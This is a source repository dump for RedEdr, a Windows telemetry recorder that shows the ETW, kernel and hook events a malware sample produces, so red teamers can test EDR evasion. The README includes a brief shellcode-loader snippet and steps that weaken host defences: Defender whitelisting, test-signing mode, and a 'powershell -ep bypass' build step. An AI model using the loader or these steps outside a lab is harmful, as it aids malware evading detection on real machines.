<https://www.gnu.org/licenses/why-not-lgpl.html>.
================================================
FILE: README.md
================================================
# RedEdr
Display events from Windows to see the detection surface of your malware. Same data as an ETW-based EDR sees (Defender, Elastic, Fibratus...).
* Identify the telemetry your malware generates (detection surface)
* Verify your anti-EDR techniques work
* Debug and analyze your malware
It generates [JSON files](https://github.com/dobin/RedEdr/tree/master/Data)
collecting [the telemetry](https://github.com/dobin/RedEdr/blob/master/Doc/captured_events.md)
of your RedTeaming tools.
It is now part of Detonator, see [detonator.r00ted.ch](https://detonator.r00ted.ch).
## Screenshots
Shellcode execution:
```c
PVOID shellcodeAddr = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memcpy(shellcodeAddr, payload, payloadSize);
VirtualProtect(shellcodeAddr, payloadSize, PAGE_EXECUTE_READWRITE, &dwOldProtection));
HANDLE hThread = CreateThread(NULL, 0, shellcodeAddr, shellcodeAddr, 0, &threadId);
```
With ntdll.dll hooking:

ETW events:

## Implemented Telemetry Consumers
* ETW
* Microsoft-Windows-Kernel-Process
* Microsoft-Windows-Kernel-Audit-API-Calls
* Microsoft-Windows-Security-Auditing
* Defender
* Microsoft-Antimalware-Engine
* Microsoft-Antimalware-RTP
* Microsoft-Antimalware-AMFilter
* Microsoft-Antimalware-Scan-Interface
* Microsoft-Antimalware-Protection
* ETW-TI (Threat Intelligence) with a PPL service via ELAM driver
* Kernel Callbacks
* PsSetCreateProcessNotifyRoutine
* PsSetCreateThreadNotifyRoutine
* PsSetLoadImageNotifyRoutine
* (ObRegisterCallbacks, not used atm)
* ntdll.dll hooking
* Callstacks
* On ntdll.dll hook invocation
* On several ETW events
* process query
* PEB
* Loaded DLL's (and their regions)
## Installation
Use a dedicated VM for RedEdr.
Extract release.zip into `C:\RedEdr`. **No other directories are supported.**
Whitelist `C:\RedEdr\RedEdr.exe` in your AV (Defender).
Start terminal as local admin.
Change into `C:\RedEdr` and run `.\RedEdr.exe`:
```
PS C:\rededr> .\RedEdr.exe
Maldev event recorder
Usage:
RedEdr [OPTION...]
-t, --trace arg Process name to trace
-e, --etw Input: Consume ETW Events
-g, --etwti Input: Consume ETW-TI Events
-m, --mplog Input: Consume Defender mplog file
-k, --kernel Input: Consume kernel callback events
-i, --inject Input: Consume DLL injection
-w, --web Output: Web server
...
```
Try: `.\RedEdr.exe --etw --trace otepad`, and then start notepad
(will be `notepad.exe` on Windows 10, `Notepad.exe` on Windows 11).
The log should be printed as stdout.
## Simple ETW Usage
RedEdr traces all processes whose image name (exe path) contains the given string.
Capture ETW events and provide a web interface on [http://localhost:8081](http://localhost:8081):
```
PS > .\RedEdr.exe --etw --web --trace notepad.exe
```
## Advanced Usage
For ntdll.dll hooking and ETW-TI, Windows needs to be configured so that it can
load our kernel module.
Change Windows boot options to enable self-signed kernel drivers and reboot.
In admin cmd:
```
PS > bcdedit /set testsigning on
PS > bcdedit -debug on
PS > shutdown /r /t 0
```
If you use Hyper-V, uncheck "Security -> Enable Secure Boot".
### ETW-TI
ETW-TI requires an ELAM driver to start `RedEdrPplService`,
and therefore requires the self-signed kernel driver option.
Make a snapshot of your VM before doing this. Currently it is
not possible to remove the PPL service again.
```
PS > .\RedEdr.exe --etw --etwti --trace notepad.exe
```
If you want Microsoft-Windows-Security-Auditing ETW events, start as SYSTEM (`psexec -i -s cmd.exe`).
See `gpedit.msc -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> System Audit Policies - Local Group Policy object`
for settings to log.
### ntdll.dll hooking
KAPC DLL injection for ntdll.dll hooking. That is what many older EDRs depend on.
Also requires our own kernel module.
```
PS > .\RedEdr.exe --hook --trace notepad.exe
```
## EDR Introspection (for Defender)
The following is useful for reverse engineering EDRs, and for verifying that your anti-EDR techniques
are targeted. It will observe Defender EDR.
For more details, see Levi's blog at [My Hacker Blog](https://blog.levi.wiki/),
and the [EDR-Introspection](https://github.com/cailllev/EDR-Introspection) project.
### Microsoft-Antimalware-Engine ETW events
Argument: `--with-antimalwareengine`
Example: `.\RedEdr.exe --etw --trace putty --web --with-antimalwareengine`
This will collect `Microsoft-Antimalware-Engine` events related to the target process.
See blog post [Defender Telemetry](https://blog.deeb.ch/posts/defender-telemetry/) for an overview of available events.
For example the "Behavior Monitoring BmProcessContextStart", which indicates Defender will start behavior monitoring on the targeted process:
```
Behavior Monitoring BmProcessContextStart etw etw_event_id:0x6D etw_pid:0x1524 etw_process:MsMpEng.exe etw_provider_name:Microsoft-Antimalware-Engine etw_tid:0x37A8 etw_time:0x1DCC98C2B514B90 id:0x3 trace_id:0x29
imagepath:\Device\HarddiskVolume6\toolz\putty.exe pid:0x11F48 processcontextid:0x188F7789520
```
### MsMpEng.exe ETW events
Argument: `--with-defendertrace`
Example: `.\RedEdr.exe --etw --etwti --trace putty --web --with-defendertrace`
This will collect `msmpeng.exe` ETW events related to our target process.
See blog post [Windows Telemetry](https://blog.deeb.ch/posts/windows-telemetry/) for an overview of available events.
For example "Info" ETW event of "Microsoft-Windows-Kernel-Audit-API-Calls" accessing our target process:
```
Info etw etw_event_id:0x6 etw_pid:0x1524 etw_process:MsMpEng.exe etw_provider_name:Microsoft-Windows-Kernel-Audit-API-Calls etw_tid:0x21E0 etw_time:0x1DCC9BA7177FD80 id:0x1 trace_id:0x29
desiredaccess:0x1FFFFF returncode:0x0 targetprocessid:0x1524 targetthreatid:0x21E0
```
## Example Output
See `Data/` directory:
* [Data](https://github.com/dobin/RedEdr/tree/master/Data)
## Hacking
Arch:
```
┌─────┐ ┌────────┐ ┌─────────┐ ┌──────┐
│ ETW │ │ ETW-TI │ │ Kernel │ │ DLL │
└──┬──┘ └───┬────┘ └────┬────┘ └──┬───┘
│ │ │ │
└─────────┴─────────┬─┴──────────┘
│
│
▼
┌────────────────┐
│ │
Event as JSON string │ Event │
│ Aggregator │
│ │ ┌──────────┐
└───────┬────────┘ │ Process │
│ └──────────┘
│ ▲
▼ │query
┌────────────────┐ │
│ │ ┌──────────┴────┐
Event as JSON in C++ │ Event ├────────►│ Process Query │
│ Processor │ └─────────────┬─┘
│ │ │add
└┬───────────────┘ ▼
│ ┌──────────────┐
│ ┌────────────────────────┐query │ │
├─┤Event Augment ├────────►┤ Mem Static │
│ └────────────────────────┘ │ │
│ ┌────────────────────────┐add └──────────────┘
├─┤Event Mem Tracker ├──────┐
│ └────────────────────────┘ │ ┌──────────────┐
│ ┌────────────────────────┐query └─►│ │
├─┤Event Detection ├───┐ │ Mem Dynamic │
│ └────────────────────────┘ └────►│ │
▼ ┌────────────────────────┐ └──────────────┘
└─┤Event Storage & Output │
└────────────────────────┘
```
IPC:
```
RedEdr.exe
┌────────────┐ ┌─────────────────┐
│ │ KERNEL_PIPE │ │ KERNEL_PIPE: Events (wchar)
│ │◄───────────────────┤ Kernel Module │
│ Pipe Server│ │ │ IOCTL: Config (MY_DRIVER_DATA):
│ ├───────────────────►│ │ filename
│ │ IOCTL └─────────────────┘ enable
│ │
│ │
│ │
│ │
│ │ ┌─────────────────┐
│ │ DLL_PIPE │ │ DLL_PIPE: 1: Config (wchar) RedEdr -> DLL
│ Pipe Server│◄───────────────────┤ Injected DLL │ "callstack:1;"
│ │ │ │
│ │ │ │ >1: Events (wchar) RedEdr <- DLL
│ │ └─────────────────┘
│ │
│ │
│ │
│ │ ┌─────────────────┐
│ │ PPL_PIPE │ │ DLL_PIPE: Events (wchar)
│ Pipe Server│◄───────────────────┤ ETW-TI Service │
│ │ │ PPL │
│ │ SERVICE_PIPE │ │ SERVICE_PIPE: Config (wchar)
│ Pipe Client├───────────────────►│ │ "start:<process name>"
│ │ └─────────────────┘
│ │
│ │ ┌─────────────────┐
│ │◄───────────────────┤ │
│ │ │ ETW │
│ │ │ │
│ │ │ │
│ │ └─────────────────┘
│ │
│ │
└────────────┘
```
## Compiling
Good luck.
Use VS2022. Compile as DEBUG.
To compile the kernel driver:
* Install WDK (+SDK): https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk
It should deploy everything into `C:\RedEdr\`.
On command line, use Visual Studio developer console.
Everything:
```
repos\RedEdr>msbuild RedEdr.sln /p:Configuration=Debug /p:Platform=x64
```
RedEdr only:
```
repos\RedEdr>msbuild RedEdr.sln /p:Configuration=Debug /p:Platform=x64 /t:RedEdr
```
## Based on
Based on MyDumbEdr
* GPLv3
* https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
* https://github.com/sensepost/mydumbedr
* patched https://github.com/dobin/mydumbedr
* which seems to use: https://github.com/CCob/SylantStrike/tree/master/SylantStrike
With KAPC injection from:
* https://github.com/0xOvid/RootkitDiaries/
* No license
To run as PPL:
* https://github.com/pathtofile/PPLRunner/
* No license
## Libraries used
* https://github.com/jarro2783/cxxopts, MIT
* https://github.com/yhirose/cpp-httplib, MIT
* https://github.com/nlohmann/json, MIT
================================================
FILE: RedEdr/RedEdr.cpp
================================================
#include <windows.h>
#include <iostream>
#include <vector>
#include "logging.h"
#include "manager.h"
#include "cxxops.hpp"
#include "config.h"
#include "event_processor.h"
#include "webserver.h"
#include "kernelinterface.h"
#include "pplmanager.h"
#include "process_query.h"
#include "privileges.h"
#include "../Shared/common.h"
/* RedEdr.c: Main file
* Parse args
* Set flags in the Config object
* Init necessary things
* Start all threads (mostly through Manager)
* Wait for threads to exit
*/
/* Console control handler.
 *
 * On Ctrl-C, console close, Ctrl-Break, logoff or shutdown it logs a
 * warning and asks the Manager to tear down all subsystems.
 *
 * ctrlType: the CTRL_*_EVENT code delivered by the console subsystem.
 * Returns TRUE when the event was consumed here, FALSE to pass it on to
 * the next handler in the chain.
 */
BOOL WINAPI ConsoleCtrlHandler(DWORD ctrlType) {
    const bool isShutdownEvent =
        ctrlType == CTRL_C_EVENT ||
        ctrlType == CTRL_CLOSE_EVENT ||
        ctrlType == CTRL_BREAK_EVENT ||
        ctrlType == CTRL_LOGOFF_EVENT ||
        ctrlType == CTRL_SHUTDOWN_EVENT;

    if (!isShutdownEvent) {
        return FALSE; // Not one of ours: let the next handler see it
    }

    LOG_A(LOG_WARNING, "\nRedEdr: Ctrl-c detected, performing shutdown");
    ManagerShutdown();
    return TRUE; // Consumed
}
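/* Ensure the data directory RedEdr writes its output into exists.
 *
 * The path is fixed to c:\rededr\data because C:\RedEdr is the only
 * supported install location (see README). The directory is created with
 * default (inherited) security attributes.
 *
 * Returns TRUE when the directory exists after the call (it was already
 * there, or it was created), FALSE when creation failed or the path exists
 * but is not a directory. The Win32 error code is printed to stderr on
 * failure.
 */
BOOL CreateRequiredFiles() {
    static const wchar_t* const dir = L"c:\\rededr\\data";

    // The literal is wide, so call the W variants explicitly instead of
    // relying on the UNICODE macro to pick GetFileAttributes/CreateDirectory.
    DWORD fileAttributes = GetFileAttributesW(dir);
    if (fileAttributes != INVALID_FILE_ATTRIBUTES && (fileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
        return TRUE;
    }

    std::cout << "Directory does not exist. Creating it...\n";
    if (CreateDirectoryW(dir, NULL)) {
        return TRUE;
    }

    // The attribute check and the creation are not atomic: if something
    // else created the directory in between, that is still success -- but
    // only if what exists now really is a directory (a plain file of the
    // same name also yields ERROR_ALREADY_EXISTS).
    DWORD err = GetLastError();
    if (err == ERROR_ALREADY_EXISTS) {
        fileAttributes = GetFileAttributesW(dir);
        if (fileAttributes != INVALID_FILE_ATTRIBUTES && (fileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
            return TRUE;
        }
    }

    std::cerr << "Failed to create directory. Error: " << err << "\n";
    return FALSE;
}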
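/* Entry point.
 *
 * Parses the command line, populates g_Config, initialises the
 * subsystems, starts all reader/output threads (mostly via the Manager)
 * and blocks until every thread has exited.
 *
 * Returns 0 on a clean shutdown (or when there was nothing to wait for),
 * 1 on a configuration or permission error. --help and the debug-only
 * actions (--krnload, --krnunload, --pplstart, --pplstop) terminate the
 * process via exit(0) before any subsystem is started.
 */
int main(int argc, char* argv[]) {
    cxxopts::Options options("RedEdr", "Maldev event recorder");
    options.add_options()
        // Input
        ("trace", "Input: Process name to observe", cxxopts::value<std::string>()->default_value("malware"))
        ("etw", "Input: Consume ETW Events", cxxopts::value<bool>()->default_value("false"))
        ("etwti", "Input: Consume ETW-TI Events", cxxopts::value<bool>()->default_value("false"))
        ("kernel", "Input: Enable kernel module", cxxopts::value<bool>()->default_value("false"))
        ("hook", "Input: DLL injection/hooking", cxxopts::value<bool>()->default_value("false"))
        // Input options
        ("with-defendertrace", "Input option Defender: Add MsMpEng.exe as target process", cxxopts::value<bool>()->default_value("false"))
        ("with-antimalwareengine", "Input option Defender: Grab ETW events of Microsoft-Antimalware-Engine (related to target process)", cxxopts::value<bool>()->default_value("false"))
        // Output
        ("web", "Output: Web server", cxxopts::value<bool>()->default_value("true"))
        ("port", "Output: Web server port", cxxopts::value<int>()->default_value("8081"))
        ("show", "Output: Show messages on stdout", cxxopts::value<bool>()->default_value("false"))
        // Debug
        ("dllreader", "Debug: DLL reader but no injection (for manual injection tests)", cxxopts::value<bool>()->default_value("false"))
        ("krnload", "Debug: Kernel Module Load", cxxopts::value<bool>()->default_value("false"))
        ("krnunload", "Debug: Kernel Module Unload", cxxopts::value<bool>()->default_value("false"))
        ("pplstart", "Debug: PPL service load", cxxopts::value<bool>()->default_value("false"))
        ("pplstop", "Debug: PPL service stop", cxxopts::value<bool>()->default_value("false"))
        ("d,debug", "Debug: Enable debug output", cxxopts::value<bool>()->default_value("false"))
        ("h,help", "Print usage")
        ;
    options.allow_unrecognised_options();
    auto result = options.parse(argc, argv);

    // Only complain about unknown arguments when there actually are some;
    // a plain --help just prints the usage text.
    const bool hasUnknownArgs = result.unmatched().size() > 0;
    if (hasUnknownArgs) {
        printf("Unrecognized argument\n");
    }
    if (result.count("help") || hasUnknownArgs) {
        std::cout << options.help() << std::endl;
        exit(0);
    }

    // Debug actions: each one performs a single administrative task and exits
    if (result.count("krnload")) {
        LoadKernelDriver();
        exit(0);
    } else if (result.count("krnunload")) {
        UnloadKernelDriver();
        exit(0);
    } else if (result.count("pplstart")) {
        InstallElamCertPpl();
        InstallPplService();
        exit(0);
    } else if (result.count("pplstop")) {
        // Instruct PPL service to exit itself (cant do it otherwise)
        // Note: we can replace the exe and start it again
        ConnectPplService();
        ShutdownPplService();
        exit(0);
    }

    // Store args in config
    if (result.count("trace")) {
        std::string traceTarget = result["trace"].as<std::string>();
        g_Config.targetProcessNames = {traceTarget};
        // ManagerApplyNewTargets(g_Config.targetProcessNames); // no need here?
    }

    // The port is handed straight to the web server; reject values that
    // cannot be a TCP port instead of failing later at bind time.
    int port = result["port"].as<int>();
    if (port < 1 || port > 65535) {
        LOG_A(LOG_ERROR, "Config: --port must be between 1 and 65535, got %d", port);
        return 1;
    }

    g_Config.do_etw = result["etw"].as<bool>();
    g_Config.do_etwti = result["etwti"].as<bool>();
    g_Config.do_kernel = result["kernel"].as<bool>();
    g_Config.do_hook = result["hook"].as<bool>();
    // Implied requirements are applied AFTER the explicit --kernel flag has
    // been read, so they can only switch the kernel module on, never off.
    if (g_Config.do_etwti) g_Config.do_kernel = true; // it works better with kernel support
    if (g_Config.do_hook) g_Config.do_kernel = true;  // hook always requires kernel module

    g_Config.debug_dllreader = result["dllreader"].as<bool>();
    g_Config.hide_full_output = !result["show"].as<bool>();
    g_Config.web_output = result["web"].as<bool>();
    g_Config.do_defendertrace = result["with-defendertrace"].as<bool>();
    g_Config.do_antimalwareengine = result["with-antimalwareengine"].as<bool>();

    if (g_Config.do_antimalwareengine && !g_Config.do_etw) {
        LOG_A(LOG_WARNING, "Config: --with-antimalwareengine has no effect without --etw");
        return 1;
    }
    // At least one input has to be enabled (--hook is covered via do_kernel)
    if (!g_Config.do_etw && !g_Config.do_kernel && !g_Config.do_etwti && !g_Config.debug_dllreader) {
        printf("Choose at least one of --etw / --etwti / --hook / --kernel\n");
        return 1;
    }

    CreateRequiredFiles();
    InitProcessQuery();
    g_EventProcessor.init(); // also done in the constructor, but at that point g_Config is not populated yet

    // All threads of all *Reader subsystems
    std::vector<HANDLE> threads;

    LOG_A(LOG_INFO, "RedEdr %s", REDEDR_VERSION);
    if (!g_Config.targetProcessNames.empty()) {
        std::string targets;
        for (size_t i = 0; i < g_Config.targetProcessNames.size(); ++i) {
            if (i > 0) targets += ", ";
            targets += g_Config.targetProcessNames[i];
        }
        LOG_A(LOG_INFO, "Config: tracing process(es): \"%s\"", targets.c_str());
    } else {
        LOG_A(LOG_INFO, "Config: no targets configured");
    }

    // SeDebugPrivilege is needed to open other processes; acquiring it
    // fails when not started elevated.
    if (!PermissionMakeMeDebug()) {
        LOG_A(LOG_ERROR, "RedEdr: Permission error - Did you start with local admin?");
        return 1;
    }
    if (!RunsAsSystem()) {
        LOG_A(LOG_WARNING, "RedEdr Permissions: Not running as SYSTEM, some ETW data is not available");
    }

    // Ctrl+C
    if (!SetConsoleCtrlHandler(ConsoleCtrlHandler, TRUE)) {
        LOG_A(LOG_ERROR, "RedEdr: Failed to set control handler");
        return 1;
    }

    // Functionality
    ManagerStart(threads);
    InitializeEventProcessor(threads);

    // Webserver - boot it last
    if (g_Config.web_output) {
        InitializeWebServer(threads, port);
    }

    for (size_t i = 0; i < threads.size(); i++) {
        LOG_A(LOG_DEBUG, "Track Thread %zu (handle 0x%p)", i, threads[i]);
    }
    LOG_A(LOG_INFO, "RedEdr: All started, ready");

    // WaitForMultipleObjects fails with WAIT_FAILED for an empty handle
    // array (and for more than MAXIMUM_WAIT_OBJECTS handles); an empty
    // array simply means there is nothing to wait for.
    if (threads.empty()) {
        LOG_A(LOG_WARNING, "RedEdr: No threads to wait for");
        return 0;
    }

    // Wait for all threads to complete
    DWORD res = WaitForMultipleObjects((DWORD)threads.size(), threads.data(), TRUE, INFINITE);
    if (res == WAIT_FAILED) {
        LOG_A(LOG_ERROR, "RedEdr: Wait failed, error %lu", GetLastError());
    }
    LOG_A(LOG_INFO, "RedEdr: all %zu threads finished", threads.size());

    // Clean up thread handles
    for (HANDLE thread : threads) {
        CloseHandle(thread);
    }
    return 0;
}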
================================================
FILE: RedEdr/RedEdr.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{d4ab9b77-7a7b-45e8-8bdc-ac958edb1372}</ProjectGuid>
<RootNamespace>RedEdr</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>C:\RedEdr\</OutDir>
<CopyLocalDeploymentContent>true</CopyLocalDeploymentContent>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>C:\RedEdr\</OutDir>
<CopyLocalDeploymentContent>true</CopyLocalDeploymentContent>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;OUTPUT_STDOUT;WIN32_LEAN_AND_MEAN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalIncludeDirectories>$(SolutionDir)RedEdrShared/;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<LanguageStandard>stdcpp17</LanguageStandard>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>Wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<PostBuildEvent>
<Command>powershell -ep bypass -f "$(SolutionDir)sign_file.ps1" "$(SolutionDir)rededr_ppl.pfx" "$(TargetDir)$(TargetFileName)"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>UNICODE;_UNICODE;NDEBUG;_CONSOLE;OUTPUT_STDOUT;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalIncludeDirectories>$(SolutionDir)RedEdrShared;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<LanguageStandard>stdcpp17</LanguageStandard>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>Wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\RedEdrShared\etw_krabs.cpp" />
<ClCompile Include="..\RedEdrShared\loguru.cpp" />
<ClCompile Include="..\RedEdrShared\piping.cpp" />
<ClCompile Include="..\RedEdrShared\myprocess.cpp" />
<ClCompile Include="..\RedEdrShared\process_mem_static.cpp" />
<ClCompile Include="..\RedEdrShared\process_resolver.cpp" />
<ClCompile Include="..\RedEdrShared\process_query.cpp" />
<ClCompile Include="..\RedEdrShared\utils.cpp" />
<ClCompile Include="event_aggregator.cpp" />
<ClCompile Include="event_augmenter.cpp" />
<ClCompile Include="event_processor.cpp" />
<ClCompile Include="logging.cpp" />
<ClCompile Include="manager.cpp" />
<ClCompile Include="config.cpp" />
<ClCompile Include="dllinjector.cpp" />
<ClCompile Include="kernelinterface.cpp" />
<ClCompile Include="etwreader.cpp" />
<ClCompile Include="dllreader.cpp" />
<ClCompile Include="kernelreader.cpp" />
<ClCompile Include="logreader.cpp" />
<ClCompile Include="pplmanager.cpp" />
<ClCompile Include="pplreader.cpp" />
<ClCompile Include="privileges.cpp" />
<ClCompile Include="RedEdr.cpp" />
<ClCompile Include="serviceutils.cpp" />
<ClCompile Include="webserver.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="loguru.hpp" />
<ClInclude Include="event_aggregator.h" />
<ClInclude Include="event_augmenter.h" />
<ClInclude Include="event_processor.h" />
<ClInclude Include="jsonw.hpp" />
<ClInclude Include="logging.h" />
<ClInclude Include="manager.h" />
<ClInclude Include="config.h" />
<ClInclude Include="cxxops.hpp" />
<ClInclude Include="dllinjector.h" />
<ClInclude Include="kernelinterface.h" />
<ClInclude Include="etwreader.h" />
<ClInclude Include="httplib.h" />
<ClInclude Include="dllreader.h" />
<ClInclude Include="kernelreader.h" />
<ClInclude Include="logreader.h" />
<ClInclude Include="pplmanager.h" />
<ClInclude Include="pplreader.h" />
<ClInclude Include="privileges.h" />
<ClInclude Include="serviceutils.h" />
<ClInclude Include="webserver.h" />
</ItemGroup>
<ItemGroup>
<Text Include="index.html">
<DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
</Text>
</ItemGroup>
<ItemGroup>
<None Include="design.css">
<DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
</None>
<None Include="packages.config" />
<None Include="shared.js">
<DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
</None>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets" Condition="Exists('..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets')" />
</ImportGroup>
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets'))" />
</Target>
</Project>
================================================
FILE: RedEdr/RedEdr.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
